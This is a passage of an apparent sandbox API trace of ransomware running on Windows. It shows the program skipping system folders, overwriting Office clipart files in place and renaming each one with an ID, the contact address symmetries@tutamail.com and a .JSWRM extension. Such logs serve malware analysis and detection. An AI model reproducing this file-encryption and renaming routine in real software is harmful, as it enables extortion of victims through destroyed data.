(HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.116] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42992) returned 1 [0076.116] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa7f0) returned 0x24c1d0 [0076.116] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xa7f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xa7f0, lpOverlapped=0x0) returned 1 [0076.120] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.120] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xa7f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xa7f0, lpOverlapped=0x0) returned 1 [0076.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.120] CloseHandle (hObject=0x460) returned 1 [0076.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0076.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0076.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0076.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0076.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0076.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.121] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00413_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00413_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0076.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.121] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa79c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00414_.WMF", cAlternateFileName="")) returned 1 [0076.121] lstrcmpiW (lpString1="DD00414_.WMF", lpString2=".") returned 1 [0076.121] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="..") returned 1 [0076.121] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="...") returned 1 [0076.122] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="windows") returned -1 [0076.122] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="recovery") returned -1 [0076.122] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="perflogs") returned -1 [0076.122] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="documents and settings") returned -1 [0076.122] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.122] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="system volume information") returned -1 [0076.122] lstrcmpiW (lpString1="DD00414_.WMF", lpString2="msocache") returned -1 [0076.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0076.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00414_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00414_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00414_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0076.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00414_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00414_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00414_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.122] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42908) returned 1 [0076.122] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa790) returned 0x24c1d0 [0076.122] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xa790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xa790, lpOverlapped=0x0) returned 1 [0076.127] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.127] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xa790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xa790, lpOverlapped=0x0) returned 1 [0076.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.127] CloseHandle (hObject=0x460) returned 1 [0076.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0076.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0076.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0076.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0076.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0076.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0076.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0076.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.128] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0076.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.128] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00419_.WMF", cAlternateFileName="")) returned 1 [0076.128] lstrcmpiW (lpString1="DD00419_.WMF", lpString2=".") returned 1 [0076.128] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="..") returned 1 [0076.128] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="...") returned 1 [0076.128] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="windows") returned -1 [0076.128] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="recovery") returned -1 [0076.128] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="perflogs") returned -1 [0076.129] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="documents and settings") returned -1 [0076.129] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.129] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="system volume information") returned -1 [0076.129] lstrcmpiW (lpString1="DD00419_.WMF", lpString2="msocache") returned -1 [0076.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00419_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00419_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00419_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00419_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00419_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00419_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.130] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=712) returned 1 [0076.130] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c0) returned 0x203550 [0076.130] ReadFile (in: hFile=0x460, lpBuffer=0x203550, nNumberOfBytesToRead=0x2c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345e89c*=0x2c0, lpOverlapped=0x0) returned 1 [0076.131] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.131] WriteFile (in: hFile=0x460, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345e898*=0x2c0, lpOverlapped=0x0) returned 1 [0076.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0076.131] CloseHandle (hObject=0x460) returned 1 [0076.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0076.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0076.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0076.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0076.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0076.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.131] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0076.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.133] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x78c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00437_.WMF", cAlternateFileName="")) returned 1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2=".") returned 1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="..") returned 1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="...") returned 1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="windows") returned -1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="recovery") returned -1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="perflogs") returned -1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="documents and settings") returned -1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="system volume information") returned -1 [0076.133] lstrcmpiW (lpString1="DD00437_.WMF", lpString2="msocache") returned -1 [0076.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0076.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00437_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00437_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00437_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0076.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0076.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00437_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00437_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00437_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0076.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.134] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1932) returned 1 [0076.134] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x780) returned 0x23fc98 [0076.134] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0076.135] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.135] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0076.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.136] CloseHandle (hObject=0x460) returned 1 [0076.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 